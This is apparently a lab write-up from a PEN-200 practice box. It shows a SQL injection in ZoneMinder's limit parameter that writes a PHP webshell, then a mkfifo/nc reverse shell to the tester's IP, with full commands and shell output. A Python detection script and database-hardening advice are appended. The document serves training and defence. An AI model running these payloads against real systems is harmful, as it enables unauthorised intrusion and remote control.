RCE via SQL injection
A SQL injection vulnerability was identified in the limit parameter of the index.php file of the target's vulnerable ZoneMinder instance. The web root directory of the instance was leaked, and write access to it was confirmed at a later stage.
PHP Webshell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ sqli=$(echo '; SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/usr/share/zoneminder/www/webshell.php" -- -' | jq -sRr @uri) ; curl -s -i -X POST http://$IP/zm/index.php -H 'Content-type: application/x-www-form-urlencoded' -d "view=request&request=log&task=query&limit=100$sqli"
Writing a PHP webshell into the web root directory, /usr/share/zoneminder/www/
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ curl http://$IP/zm/webshell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Webshell execution confirmed
RCE
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ alias urlencode='/usr/bin/jq -sRr @uri'
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ cmd=$(echo 'mkfifo /tmp/datj; nc 192.168.45.192 21 0</tmp/datj | /bin/sh >/tmp/datj 2>&1; rm /tmp/datj' | urlencode) ; curl http://$IP/zm/webshell.php?cmd=$cmd
Sending the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ nnc 21
listening on [any] 21 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.209.52] 50320
whoami
www-data
hostname
pebbles
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:b0:4b brd ff:ff:ff:ff:ff:ff
inet 192.168.209.52/24 brd 192.168.209.255 scope global ens160
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the www-data account via SQL injection to RCE.
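A defender-side correlation check for the chain above, as an added example that is not part of the original writeup: it scans request records for INTO OUTFILE/DUMPFILE writes under the leaked web root and flags any later request to the dropped file. The records are constructed here in the shape a WAF or reverse proxy that logs POST bodies would export (a plain access log lacks the body); WEB_ROOT, URL_PREFIX and the record format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed mapping of the leaked web root to its URL prefix (paths taken from the writeup).
WEB_ROOT = "/usr/share/zoneminder/www"
URL_PREFIX = "/zm"

# Matches a MySQL file-write clause and captures the quoted target path.
OUTFILE_RE = re.compile(r"INTO\s+(?:OUT|DUMP)FILE\s+['\"]([^'\"]+)['\"]", re.IGNORECASE)

# Constructed request records (not from the page); the second one mirrors the
# injected limit parameter, the third the follow-up webshell invocation.
SAMPLE_RECORDS = [
    {"src": "10.0.0.5", "method": "GET", "url": "/zm/index.php?view=console", "body": ""},
    {"src": "10.0.0.9", "method": "POST", "url": "/zm/index.php",
     "body": "view=request&request=log&task=query&limit=100%3B%20SELECT%20%22%3C%3Fphp%20"
             "system%28%24_GET%5Bcmd%5D%29%3B%20%3F%3E%22%20INTO%20OUTFILE%20%22%2Fusr%2F"
             "share%2Fzoneminder%2Fwww%2Fwebshell.php%22%20--%20-"},
    {"src": "10.0.0.9", "method": "GET", "url": "/zm/webshell.php?cmd=id", "body": ""},
    {"src": "10.0.0.5", "method": "POST", "url": "/zm/index.php",
     "body": "view=request&request=log&task=query&limit=100"},
]


def _params(record):
    """Merge decoded query-string and body parameters into one name -> values dict."""
    merged = parse_qs(urlsplit(record["url"]).query, keep_blank_values=True)
    for name, values in parse_qs(record.get("body", ""), keep_blank_values=True).items():
        merged.setdefault(name, []).extend(values)
    return merged


def analyze(records):
    """Return findings; a file write into the web root marks its URL so later hits are flagged."""
    findings = []
    dropped_paths = set()  # URL paths of files written via INTO OUTFILE/DUMPFILE
    for rec in records:
        params = _params(rec)
        for name, values in params.items():
            for value in values:
                match = OUTFILE_RE.search(value)
                if match:
                    target = match.group(1)
                    findings.append(("sqli_file_write", rec["src"], name, target))
                    if target.startswith(WEB_ROOT + "/"):
                        dropped_paths.add(URL_PREFIX + target[len(WEB_ROOT):])
        path = urlsplit(rec["url"]).path
        if path in dropped_paths:
            findings.append(("webshell_hit", rec["src"], path, params.get("cmd", [""])[0]))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_RECORDS):
        print(finding)
```

On the database side, MySQL's secure_file_priv setting restricts where INTO OUTFILE may write, and the database account should have no write access to the web root at all.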